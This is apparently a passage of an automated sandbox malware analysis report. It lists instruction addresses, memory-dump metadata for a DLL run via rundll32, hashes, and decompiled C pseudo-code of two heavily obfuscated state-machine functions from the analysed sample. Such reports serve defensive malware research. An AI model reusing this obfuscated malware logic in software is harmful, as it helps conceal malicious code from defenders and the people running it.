                                                                        0x100044f3
                                                                        0x10004500
                                                                        0x10004501
                                                                        0x10004505
                                                                        0x1000450d
                                                                        0x1000451a
                                                                        0x1000451e
                                                                        0x10004526
                                                                        0x1000452e
                                                                        0x1000453b
                                                                        0x1000453f
                                                                        0x10004547
                                                                        0x1000454f
                                                                        0x10004554
                                                                        0x1000455c
                                                                        0x10004564
                                                                        0x1000456c
                                                                        0x10004574
                                                                        0x1000457c
                                                                        0x10004584
                                                                        0x1000458c
                                                                        0x10004594
                                                                        0x100045a2
                                                                        0x100045a6
                                                                        0x100045ae
                                                                        0x100045bb
                                                                        0x100045bf
                                                                        0x100045c7
                                                                        0x100045cf
                                                                        0x100045e2
                                                                        0x100045e9
                                                                        0x100045f4
                                                                        0x10004601
                                                                        0x1000460d
                                                                        0x10004612
                                                                        0x10004618
                                                                        0x10004625
                                                                        0x10004632
                                                                        0x1000463c
                                                                        0x10004641
                                                                        0x10004649
                                                                        0x10004655
                                                                        0x1000465a
                                                                        0x10004660
                                                                        0x10004665
                                                                        0x1000466a
                                                                        0x10004672
                                                                        0x1000467f
                                                                        0x10004680
                                                                        0x1000468a
                                                                        0x1000468e
                                                                        0x10004696
                                                                        0x1000469e
                                                                        0x100046ab
                                                                        0x100046af
                                                                        0x100046b7
                                                                        0x100046b7
                                                                        0x100046c5
                                                                        0x100047bc
                                                                        0x100047c1
                                                                        0x1000480f
                                                                        0x1000482e
                                                                        0x10004833
                                                                        0x10004836
                                                                        0x00000000
                                                                        0x10004836
                                                                        0x100046d1
                                                                        0x10004765
                                                                        0x10004784
                                                                        0x100047aa
                                                                        0x100047af
                                                                        0x100047b2
                                                                        0x00000000
                                                                        0x100047b2
                                                                        0x100046d5
                                                                        0x1000474a
                                                                        0x1000473f
                                                                        0x1000473f
                                                                        0x00000000
                                                                        0x1000473f
                                                                        0x100046d9
                                                                        0x1000473a
                                                                        0x00000000
                                                                        0x1000473a
                                                                        0x100046e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10004718
                                                                        0x1000471b
                                                                        0x00000000
                                                                        0x10004728
                                                                        0x10004845
                                                                        0x1000484c
                                                                        0x10004855
                                                                        0x00000000
                                                                        0x10004855
                                                                        0x1000484e
                                                                        0x00000000
                                                                        0x10004857
                                                                        0x10004857
                                                                        0x10004857
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4W$?/$@ak$T"$dS$r)$;
                                                                        • API String ID: 0-3846280122
                                                                        • Opcode ID: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
                                                                        • Instruction ID: aaaead02f87506f2cc3ba4b8236e1e241c9b44c198d9f5d598770aa8f5f1306b
                                                                        • Opcode Fuzzy Hash: 8777fcd8c6a0117b101e56232f2fabb5ebae04027da6477abffc8acb09d1d06a
                                                                        • Instruction Fuzzy Hash: FFF131715083809FE368CF25C489A4FBBE2FBC5758F10891DF19A8A260DBB58949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001EDB9, Relevance: 9.0, Strings: 7, Instructions: 225COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E1001EDB9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				void* _t250;
				void* _t253;
				void* _t263;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int* _t298;

				_t298 =  &_v1660;
				_v1584 = 0xa79a;
				_v1584 = _v1584 + 0xffffb587;
				_t263 = 0x29655c79;
				_v1584 = _v1584 ^ 0x00005d08;
				_v1600 = 0x98d7;
				_v1600 = _v1600 << 3;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x00015089;
				_v1576 = 0x4e32;
				_v1576 = _v1576 * 0x22;
				_t289 = 0;
				_v1576 = _v1576 ^ 0x000a4295;
				_v1616 = 0x1d29;
				_v1616 = _v1616 + 0xffff7723;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x01ffbac3;
				_v1632 = 0x8dbf;
				_v1632 = _v1632 >> 0xa;
				_t290 = 0x76;
				_v1632 = _v1632 * 0x3a;
				_v1632 = _v1632 | 0x3b821885;
				_v1632 = _v1632 ^ 0x3b827377;
				_v1640 = 0x104a;
				_v1640 = _v1640 / _t290;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 + 0xffff7725;
				_v1640 = _v1640 ^ 0xffff57b6;
				_v1580 = 0xe6dc;
				_v1580 = _v1580 ^ 0xc8d716f9;
				_v1580 = _v1580 ^ 0xc8d7d197;
				_v1592 = 0xe0fa;
				_t291 = 0x2f;
				_v1592 = _v1592 / _t291;
				_v1592 = _v1592 ^ 0x0000698d;
				_v1564 = 0x5e4f;
				_v1564 = _v1564 + 0xffff7efe;
				_v1564 = _v1564 ^ 0xffffb6a6;
				_v1660 = 0xba44;
				_v1660 = _v1660 * 0x61;
				_v1660 = _v1660 | 0x90c21cb8;
				_v1660 = _v1660 ^ 0xb89d15b1;
				_v1660 = _v1660 ^ 0x285bb090;
				_v1572 = 0x49e8;
				_v1572 = _v1572 | 0x7392aca1;
				_v1572 = _v1572 ^ 0x7392e7ec;
				_v1636 = 0x1558;
				_v1636 = _v1636 + 0xffffdbcc;
				_v1636 = _v1636 + 0xffffaf90;
				_v1636 = _v1636 | 0x27f9081b;
				_v1636 = _v1636 ^ 0xffff923a;
				_v1620 = 0xb008;
				_v1620 = _v1620 ^ 0x6f98128b;
				_v1620 = _v1620 + 0xffff628e;
				_v1620 = _v1620 ^ 0x6f98181c;
				_v1652 = 0x8c98;
				_v1652 = _v1652 + 0xffff2e73;
				_v1652 = _v1652 ^ 0xfa65a217;
				_v1652 = _v1652 ^ 0x9182de5d;
				_v1652 = _v1652 ^ 0x9418af52;
				_v1644 = 0x793;
				_v1644 = _v1644 ^ 0x7d1bb9ea;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 >> 3;
				_v1644 = _v1644 ^ 0x0ddf10b4;
				_v1568 = 0x9636;
				_v1568 = _v1568 << 8;
				_v1568 = _v1568 ^ 0x009600d5;
				_v1648 = 0x45b1;
				_v1648 = _v1648 ^ 0x353fc9cd;
				_v1648 = _v1648 + 0x9448;
				_v1648 = _v1648 + 0xffff2c3a;
				_v1648 = _v1648 ^ 0x353f36fa;
				_v1608 = 0xcb4a;
				_v1608 = _v1608 ^ 0xf323fa50;
				_v1608 = _v1608 + 0xfffff921;
				_v1608 = _v1608 ^ 0xf3231221;
				_v1656 = 0xe414;
				_v1656 = _v1656 << 5;
				_t292 = 0x14;
				_v1656 = _v1656 * 0xb;
				_v1656 = _v1656 / _t292;
				_v1656 = _v1656 ^ 0x000fea65;
				_v1588 = 0xfdd9;
				_v1588 = _v1588 ^ 0x3c6de270;
				_v1588 = _v1588 ^ 0x3c6d203a;
				_v1596 = 0x9110;
				_t293 = 0x5b;
				_v1596 = _v1596 / _t293;
				_v1596 = _v1596 ^ 0xad99dc79;
				_v1596 = _v1596 ^ 0xad99c3bd;
				_v1604 = 0xf5c3;
				_v1604 = _v1604 + 0xffffe486;
				_t294 = 0x52;
				_v1604 = _v1604 / _t294;
				_v1604 = _v1604 ^ 0x00000517;
				_v1612 = 0xce05;
				_v1612 = _v1612 + 0xa493;
				_v1612 = _v1612 | 0x844a9c62;
				_v1612 = _v1612 ^ 0x844bf5c1;
				_v1628 = 0xfbe7;
				_v1628 = _v1628 ^ 0xe81fb84e;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xf43ac181;
				_v1624 = 0x777e;
				_t295 = 0x13;
				_v1624 = _v1624 / _t295;
				_v1624 = _v1624 + 0xbc0b;
				_v1624 = _v1624 ^ 0x0000c134;
				do {
					while(_t263 != 0x1a33eb4b) {
						if(_t263 == 0x29655c79) {
							_push(_t263);
							E10001D54(_v1600, _t263, _v1576, _v1616, _v1632,  &_v1040, _v1640, _v1584);
							_t298 =  &(_t298[8]);
							_t263 = 0x3af62d5c;
							continue;
						} else {
							_t302 = _t263 - 0x3af62d5c;
							if(_t263 == 0x3af62d5c) {
								_push(0x10001020);
								_push(_v1564);
								_t253 = E1001BF25(_v1580, _v1592, _t302);
								E100173C0( &_v1560, _t302);
								E10003482(_v1572, _t302,  &_v1040,  &_v520, _v1636, _v1620,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t253, _v1652, _v1644, _v1568);
								E1001C5F7(_v1648, _v1608, _v1656, _v1588, _t253);
								_t298 =  &(_t298[0x11]);
								_t263 = 0x1a33eb4b;
								continue;
							}
						}
						goto L7;
					}
					_push(_v1624);
					_push(0);
					_push( &_v520);
					_push(_t263);
					_push(_v1628);
					_push(_v1612);
					_push(0);
					_push(0);
					_t250 = E100189F6(_v1596, _v1604, __eflags);
					_t298 =  &(_t298[8]);
					__eflags = _t250;
					_t289 =  !=  ? 1 : _t289;
					_t263 = 0x29dc45dd;
					L7:
					__eflags = _t263 - 0x29dc45dd;
				} while (__eflags != 0);
				return _t289;
			}










































                                                                        0x1001edb9
                                                                        0x1001edbf
                                                                        0x1001edc9
                                                                        0x1001edd1
                                                                        0x1001edd6
                                                                        0x1001edde
                                                                        0x1001ede6
                                                                        0x1001edeb
                                                                        0x1001edf0
                                                                        0x1001edf8
                                                                        0x1001ee0a
                                                                        0x1001ee0e
                                                                        0x1001ee10
                                                                        0x1001ee18
                                                                        0x1001ee20
                                                                        0x1001ee28
                                                                        0x1001ee2d
                                                                        0x1001ee35
                                                                        0x1001ee3d
                                                                        0x1001ee47
                                                                        0x1001ee4a
                                                                        0x1001ee4e
                                                                        0x1001ee56
                                                                        0x1001ee5e
                                                                        0x1001ee6e
                                                                        0x1001ee72
                                                                        0x1001ee77
                                                                        0x1001ee7f
                                                                        0x1001ee87
                                                                        0x1001ee8f
                                                                        0x1001ee97
                                                                        0x1001ee9f
                                                                        0x1001eeab
                                                                        0x1001eeae
                                                                        0x1001eeb2
                                                                        0x1001eeba
                                                                        0x1001eec2
                                                                        0x1001eeca
                                                                        0x1001eed2
                                                                        0x1001eedf
                                                                        0x1001eee3
                                                                        0x1001eeeb
                                                                        0x1001eef3
                                                                        0x1001eefb
                                                                        0x1001ef03
                                                                        0x1001ef0b
                                                                        0x1001ef13
                                                                        0x1001ef1b
                                                                        0x1001ef23
                                                                        0x1001ef2b
                                                                        0x1001ef33
                                                                        0x1001ef3b
                                                                        0x1001ef43
                                                                        0x1001ef4b
                                                                        0x1001ef53
                                                                        0x1001ef5b
                                                                        0x1001ef63
                                                                        0x1001ef6b
                                                                        0x1001ef73
                                                                        0x1001ef7b
                                                                        0x1001ef83
                                                                        0x1001ef8b
                                                                        0x1001ef93
                                                                        0x1001ef98
                                                                        0x1001ef9d
                                                                        0x1001efa5
                                                                        0x1001efad
                                                                        0x1001efb2
                                                                        0x1001efba
                                                                        0x1001efc4
                                                                        0x1001efd1
                                                                        0x1001efd9
                                                                        0x1001efe1
                                                                        0x1001efe9
                                                                        0x1001eff1
                                                                        0x1001eff9
                                                                        0x1001f001
                                                                        0x1001f009
                                                                        0x1001f011
                                                                        0x1001f01d
                                                                        0x1001f020
                                                                        0x1001f02c
                                                                        0x1001f030
                                                                        0x1001f038
                                                                        0x1001f040
                                                                        0x1001f048
                                                                        0x1001f050
                                                                        0x1001f05c
                                                                        0x1001f061
                                                                        0x1001f067
                                                                        0x1001f06f
                                                                        0x1001f077
                                                                        0x1001f07f
                                                                        0x1001f08b
                                                                        0x1001f090
                                                                        0x1001f096
                                                                        0x1001f09e
                                                                        0x1001f0a6
                                                                        0x1001f0ae
                                                                        0x1001f0b6
                                                                        0x1001f0be
                                                                        0x1001f0c6
                                                                        0x1001f0ce
                                                                        0x1001f0d3
                                                                        0x1001f0db
                                                                        0x1001f0e7
                                                                        0x1001f0ea
                                                                        0x1001f0ee
                                                                        0x1001f0f6
                                                                        0x1001f0fe
                                                                        0x1001f0fe
                                                                        0x1001f110
                                                                        0x1001f1bb
                                                                        0x1001f1dd
                                                                        0x1001f1e2
                                                                        0x1001f1e5
                                                                        0x00000000
                                                                        0x1001f116
                                                                        0x1001f116
                                                                        0x1001f118
                                                                        0x1001f11e
                                                                        0x1001f123
                                                                        0x1001f12f
                                                                        0x1001f13a
                                                                        0x1001f18d
                                                                        0x1001f1a9
                                                                        0x1001f1ae
                                                                        0x1001f1b1
                                                                        0x00000000
                                                                        0x1001f1b1
                                                                        0x1001f118
                                                                        0x00000000
                                                                        0x1001f110
                                                                        0x1001f1ec
                                                                        0x1001f1f7
                                                                        0x1001f1f9
                                                                        0x1001f1fa
                                                                        0x1001f1fb
                                                                        0x1001f1ff
                                                                        0x1001f20b
                                                                        0x1001f20d
                                                                        0x1001f20f
                                                                        0x1001f216
                                                                        0x1001f21a
                                                                        0x1001f21c
                                                                        0x1001f21f
                                                                        0x1001f224
                                                                        0x1001f224
                                                                        0x1001f224
                                                                        0x1001f23b

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
                                                                        • API String ID: 0-1365918997
                                                                        • Opcode ID: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
                                                                        • Instruction ID: 07705b716052aaf1326add7495473fb9ceb929661d391744f26a35cbcf8e81d5
                                                                        • Opcode Fuzzy Hash: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
                                                                        • Instruction Fuzzy Hash: DBB110B11083819FD3A8CF65C98995BBBE1FBC4748F108A1DF1968A2A0D3B5D949CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10014693, Relevance: 7.9, Strings: 6, Instructions: 366COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E10014693(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t341;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				void* _t414;
				signed int* _t461;
				void* _t462;
				signed int _t463;
				signed int* _t466;
				void* _t469;

				_push(_a8);
				_t461 = _a4;
				_t462 = __ecx;
				_push(_t461);
				_push(__ecx);
				E100056B2(_t341);
				_v56 = _v56 & 0x00000000;
				_t466 =  &(( &_v192)[4]);
				_v60 = 0x669039;
				_v192 = 0x43d8;
				_t414 = 0x3f50d67;
				_v192 = _v192 + 0xbf58;
				_v192 = _v192 << 6;
				_t403 = 0x63;
				_v192 = _v192 / _t403;
				_v192 = _v192 ^ 0x0000f3e0;
				_v124 = 0xc4a4;
				_v124 = _v124 + 0x7400;
				_v124 = _v124 << 8;
				_v124 = _v124 ^ 0x01388cfe;
				_v156 = 0x33d6;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_t404 = 0x3d;
				_v156 = _v156 / _t404;
				_v156 = _v156 ^ 0x000de827;
				_v64 = 0xebcf;
				_v64 = _v64 << 6;
				_v64 = _v64 ^ 0x003ae596;
				_v172 = 0x968a;
				_v172 = _v172 + 0xffffd46d;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0xd191ab81;
				_v172 = _v172 ^ 0xd192e477;
				_v128 = 0xb9a8;
				_v128 = _v128 >> 0x10;
				_t405 = 0x76;
				_v128 = _v128 * 0x5e;
				_v128 = _v128 ^ 0x000020d6;
				_v140 = 0x545;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0xc4bcec74;
				_v140 = _v140 ^ 0xc4be45d2;
				_v176 = 0xd323;
				_v176 = _v176 ^ 0x784c5418;
				_v176 = _v176 << 0xc;
				_v176 = _v176 / _t405;
				_v176 = _v176 ^ 0x01b2deaa;
				_v184 = 0x38a8;
				_v184 = _v184 * 0x62;
				_v184 = _v184 | 0x92387752;
				_v184 = _v184 * 0x36;
				_v184 = _v184 ^ 0xd91272a1;
				_v68 = 0x8687;
				_v68 = _v68 | 0x8796c77c;
				_v68 = _v68 ^ 0x8796e993;
				_v84 = 0x4bf9;
				_v84 = _v84 ^ 0xc2db0559;
				_v84 = _v84 ^ 0xc2db1bd4;
				_v152 = 0xec5b;
				_v152 = _v152 * 0x77;
				_t406 = 0x48;
				_v152 = _v152 / _t406;
				_v152 = _v152 << 1;
				_v152 = _v152 ^ 0x00037fba;
				_v96 = 0x6f52;
				_v96 = _v96 / _t406;
				_v96 = _v96 ^ 0x00007059;
				_v144 = 0x2d9f;
				_v144 = _v144 + 0x5a02;
				_v144 = _v144 + 0xffff7526;
				_t407 = 0x14;
				_v144 = _v144 * 0x64;
				_v144 = _v144 ^ 0xfffec776;
				_v104 = 0x3779;
				_v104 = _v104 + 0x6440;
				_v104 = _v104 ^ 0x0000977f;
				_v148 = 0x1d77;
				_v148 = _v148 * 0x7c;
				_v148 = _v148 / _t407;
				_v148 = _v148 + 0xffff1bf8;
				_v148 = _v148 ^ 0xffffcd98;
				_v100 = 0xd3a2;
				_v100 = _v100 | 0xe4f90cf7;
				_v100 = _v100 ^ 0xe4f9cd3c;
				_v180 = 0x5cac;
				_v180 = _v180 + 0xffff9624;
				_v180 = _v180 + 0xffff4ad1;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0xfffcf483;
				_v108 = 0x7cb5;
				_t408 = 0x18;
				_v108 = _v108 * 0x12;
				_v108 = _v108 ^ 0x000894d5;
				_v116 = 0x5a78;
				_v116 = _v116 / _t408;
				_v116 = _v116 + 0x27ad;
				_v116 = _v116 ^ 0x00004e34;
				_v76 = 0x7bae;
				_t409 = 0x47;
				_v76 = _v76 / _t409;
				_v76 = _v76 ^ 0x00000ced;
				_v112 = 0x9931;
				_v112 = _v112 + 0x6c1;
				_v112 = _v112 + 0xc184;
				_v112 = _v112 ^ 0x000135f5;
				_v120 = 0x43fe;
				_v120 = _v120 << 0xa;
				_v120 = _v120 | 0xcc2e0fa7;
				_v120 = _v120 ^ 0xcd2fcc20;
				_v160 = 0xf125;
				_v160 = _v160 | 0x7ac202f8;
				_v160 = _v160 << 9;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xff40056a;
				_v168 = 0x6f11;
				_v168 = _v168 * 0x26;
				_v168 = _v168 >> 5;
				_v168 = _v168 + 0xffff1ec9;
				_v168 = _v168 ^ 0xffffabe9;
				_v136 = 0x750;
				_v136 = _v136 ^ 0x499ec156;
				_t410 = 0x2c;
				_v136 = _v136 / _t410;
				_v136 = _v136 ^ 0x01ac6e57;
				_v164 = 0xde1f;
				_v164 = _v164 ^ 0x9a2c0c2f;
				_v164 = _v164 ^ 0xfc2f145b;
				_t463 = 0x60;
				_v164 = _v164 / _t463;
				_v164 = _v164 ^ 0x01104128;
				_v92 = 0x3401;
				_v92 = _v92 + 0xfffffc2d;
				_v92 = _v92 ^ 0x00002a73;
				_v188 = 0x45d7;
				_t411 = 0x13;
				_v188 = _v188 * 0x21;
				_v188 = _v188 * 0x1d;
				_v188 = _v188 * 0x48;
				_v188 = _v188 ^ 0x496dbef5;
				_v72 = 0x3e06;
				_v72 = _v72 / _t411;
				_v72 = _v72 ^ 0x000062d8;
				_v80 = 0xd8ef;
				_v80 = _v80 + 0xffffbf53;
				_v80 = _v80 ^ 0x0000c5f4;
				_v88 = 0x5fbd;
				_v88 = _v88 | 0x60cc2402;
				_v88 = _v88 ^ 0x60cc7a75;
				_v132 = 0xf2b5;
				_v132 = _v132 << 8;
				_v132 = _v132 / _t463;
				_v132 = _v132 ^ 0x00028738;
				goto L1;
				do {
					while(1) {
						L1:
						_t469 = _t414 - 0x1739e244;
						if(_t469 > 0) {
							break;
						}
						if(_t469 == 0) {
							E1001F3E9(_v156, _v64, _v172, _t461,  &_v52);
							_t466 =  &(_t466[3]);
							_t414 = 0x28f53702;
							continue;
						} else {
							if(_t414 == 0x9fb2af) {
								E1000CD04(_v108,  *((intOrPtr*)(_t462 + 0x14)), _v116,  &_v52, _v76);
								_t466 =  &(_t466[3]);
								_t414 = 0x25cb38c6;
								continue;
							} else {
								if(_t414 == 0x3f50d67) {
									_t414 = 0xe8afa1d;
									 *_t461 =  *_t461 & 0x00000000;
									_t461[1] = _v132;
									continue;
								} else {
									if(_t414 == 0x65a472b) {
										E1000CD04(_v148,  *((intOrPtr*)(_t462 + 0x10)), _v100,  &_v52, _v180);
										_t466 =  &(_t466[3]);
										_t414 = 0x9fb2af;
										continue;
									} else {
										if(_t414 == 0x966e996) {
											E1000CD04(_v72,  *((intOrPtr*)(_t462 + 0x28)), _v80,  &_v52, _v88);
										} else {
											if(_t414 == 0xe8afa1d) {
												_t461[1] = E10015DAA(_t462);
												_t414 = 0x35acaa76;
												continue;
											} else {
												_t475 = _t414 - 0x16696929;
												if(_t414 != 0x16696929) {
													goto L26;
												} else {
													E10018582(_v136, _t462 + 0x20, _t475, _v164,  &_v52, _v92, _v188);
													_t466 =  &(_t466[4]);
													_t414 = 0x966e996;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L29:
						__eflags =  *_t461;
						_t340 =  *_t461 != 0;
						__eflags = _t340;
						return 0 | _t340;
					}
					__eflags = _t414 - 0x1b4d4176;
					if(_t414 == 0x1b4d4176) {
						E1000CD04(_v96,  *((intOrPtr*)(_t462 + 0xc)), _v144,  &_v52, _v104);
						_t466 =  &(_t466[3]);
						_t414 = 0x65a472b;
						goto L26;
					} else {
						__eflags = _t414 - 0x25c5cce0;
						if(_t414 == 0x25c5cce0) {
							E1000CD04(_v68,  *((intOrPtr*)(_t462 + 8)), _v84,  &_v52, _v152);
							_t466 =  &(_t466[3]);
							_t414 = 0x1b4d4176;
							goto L1;
						} else {
							__eflags = _t414 - 0x25cb38c6;
							if(__eflags == 0) {
								E10018582(_v112, _t462 + 0x18, __eflags, _v120,  &_v52, _v160, _v168);
								_t466 =  &(_t466[4]);
								_t414 = 0x16696929;
								goto L1;
							} else {
								__eflags = _t414 - 0x28f53702;
								if(__eflags == 0) {
									E10018582(_v128, _t462, __eflags, _v140,  &_v52, _v176, _v184);
									_t466 =  &(_t466[4]);
									_t414 = 0x25c5cce0;
									goto L1;
								} else {
									__eflags = _t414 - 0x35acaa76;
									if(_t414 != 0x35acaa76) {
										goto L26;
									} else {
										_push(_t414);
										_t402 = E100157E8(_t461[1]);
										 *_t461 = _t402;
										__eflags = _t402;
										if(__eflags != 0) {
											_t414 = 0x1739e244;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t414 - 0xa1cf13b;
				} while (__eflags != 0);
				goto L29;
			}
























































                                                                        0x1001469d
                                                                        0x100146a4
                                                                        0x100146ab
                                                                        0x100146ad
                                                                        0x100146af
                                                                        0x100146b0
                                                                        0x100146b5
                                                                        0x100146bd
                                                                        0x100146c0
                                                                        0x100146cd
                                                                        0x100146d5
                                                                        0x100146da
                                                                        0x100146e2
                                                                        0x100146ed
                                                                        0x100146f2
                                                                        0x100146f8
                                                                        0x10014700
                                                                        0x10014708
                                                                        0x10014710
                                                                        0x10014715
                                                                        0x1001471d
                                                                        0x10014725
                                                                        0x1001472a
                                                                        0x10014733
                                                                        0x10014738
                                                                        0x1001473e
                                                                        0x10014746
                                                                        0x10014751
                                                                        0x10014759
                                                                        0x10014764
                                                                        0x1001476c
                                                                        0x10014774
                                                                        0x10014779
                                                                        0x10014781
                                                                        0x10014789
                                                                        0x10014791
                                                                        0x1001479b
                                                                        0x1001479c
                                                                        0x100147a0
                                                                        0x100147a8
                                                                        0x100147b0
                                                                        0x100147b5
                                                                        0x100147bd
                                                                        0x100147c5
                                                                        0x100147cd
                                                                        0x100147d5
                                                                        0x100147e0
                                                                        0x100147e4
                                                                        0x100147ec
                                                                        0x100147f9
                                                                        0x100147fd
                                                                        0x1001480a
                                                                        0x1001480e
                                                                        0x10014816
                                                                        0x10014821
                                                                        0x1001482c
                                                                        0x10014837
                                                                        0x1001483f
                                                                        0x10014847
                                                                        0x1001484f
                                                                        0x1001485c
                                                                        0x10014868
                                                                        0x1001486d
                                                                        0x10014871
                                                                        0x10014875
                                                                        0x1001487d
                                                                        0x1001488d
                                                                        0x10014893
                                                                        0x1001489b
                                                                        0x100148a3
                                                                        0x100148ab
                                                                        0x100148b8
                                                                        0x100148bb
                                                                        0x100148bf
                                                                        0x100148c7
                                                                        0x100148cf
                                                                        0x100148d7
                                                                        0x100148df
                                                                        0x100148ec
                                                                        0x100148f8
                                                                        0x100148fc
                                                                        0x10014904
                                                                        0x1001490c
                                                                        0x10014914
                                                                        0x1001491c
                                                                        0x10014924
                                                                        0x1001492c
                                                                        0x10014934
                                                                        0x1001493c
                                                                        0x10014941
                                                                        0x10014949
                                                                        0x10014956
                                                                        0x10014959
                                                                        0x1001495d
                                                                        0x10014965
                                                                        0x10014975
                                                                        0x10014979
                                                                        0x10014981
                                                                        0x10014989
                                                                        0x1001499b
                                                                        0x1001499e
                                                                        0x100149a5
                                                                        0x100149b0
                                                                        0x100149b8
                                                                        0x100149c0
                                                                        0x100149c8
                                                                        0x100149d0
                                                                        0x100149d8
                                                                        0x100149dd
                                                                        0x100149e5
                                                                        0x100149ed
                                                                        0x100149f5
                                                                        0x100149fd
                                                                        0x10014a02
                                                                        0x10014a07
                                                                        0x10014a0f
                                                                        0x10014a1c
                                                                        0x10014a20
                                                                        0x10014a25
                                                                        0x10014a2f
                                                                        0x10014a37
                                                                        0x10014a3f
                                                                        0x10014a4d
                                                                        0x10014a52
                                                                        0x10014a56
                                                                        0x10014a5e
                                                                        0x10014a66
                                                                        0x10014a6e
                                                                        0x10014a7c
                                                                        0x10014a81
                                                                        0x10014a85
                                                                        0x10014a8d
                                                                        0x10014a95
                                                                        0x10014a9d
                                                                        0x10014aa5
                                                                        0x10014ab4
                                                                        0x10014ab5
                                                                        0x10014abe
                                                                        0x10014ac7
                                                                        0x10014acb
                                                                        0x10014ad3
                                                                        0x10014aee
                                                                        0x10014af5
                                                                        0x10014b00
                                                                        0x10014b0b
                                                                        0x10014b16
                                                                        0x10014b21
                                                                        0x10014b29
                                                                        0x10014b31
                                                                        0x10014b39
                                                                        0x10014b41
                                                                        0x10014b51
                                                                        0x10014b55
                                                                        0x10014b55
                                                                        0x10014b5d
                                                                        0x10014b5d
                                                                        0x10014b5d
                                                                        0x10014b5d
                                                                        0x10014b5f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014b65
                                                                        0x10014c63
                                                                        0x10014c68
                                                                        0x10014c6b
                                                                        0x00000000
                                                                        0x10014b6b
                                                                        0x10014b71
                                                                        0x10014c39
                                                                        0x10014c3e
                                                                        0x10014c41
                                                                        0x00000000
                                                                        0x10014b77
                                                                        0x10014b7d
                                                                        0x10014c12
                                                                        0x10014c14
                                                                        0x10014c17
                                                                        0x00000000
                                                                        0x10014b83
                                                                        0x10014b89
                                                                        0x10014bfc
                                                                        0x10014c01
                                                                        0x10014c04
                                                                        0x00000000
                                                                        0x10014b8b
                                                                        0x10014b91
                                                                        0x10014da3
                                                                        0x10014b97
                                                                        0x10014b99
                                                                        0x10014bd8
                                                                        0x10014bdb
                                                                        0x00000000
                                                                        0x10014b9b
                                                                        0x10014b9b
                                                                        0x10014ba1
                                                                        0x00000000
                                                                        0x10014ba7
                                                                        0x10014bc2
                                                                        0x10014bc7
                                                                        0x10014bca
                                                                        0x00000000
                                                                        0x10014bca
                                                                        0x10014ba1
                                                                        0x10014b99
                                                                        0x10014b91
                                                                        0x10014b89
                                                                        0x10014b7d
                                                                        0x10014b71
                                                                        0x10014dab
                                                                        0x10014dad
                                                                        0x10014db2
                                                                        0x10014db2
                                                                        0x10014dbc
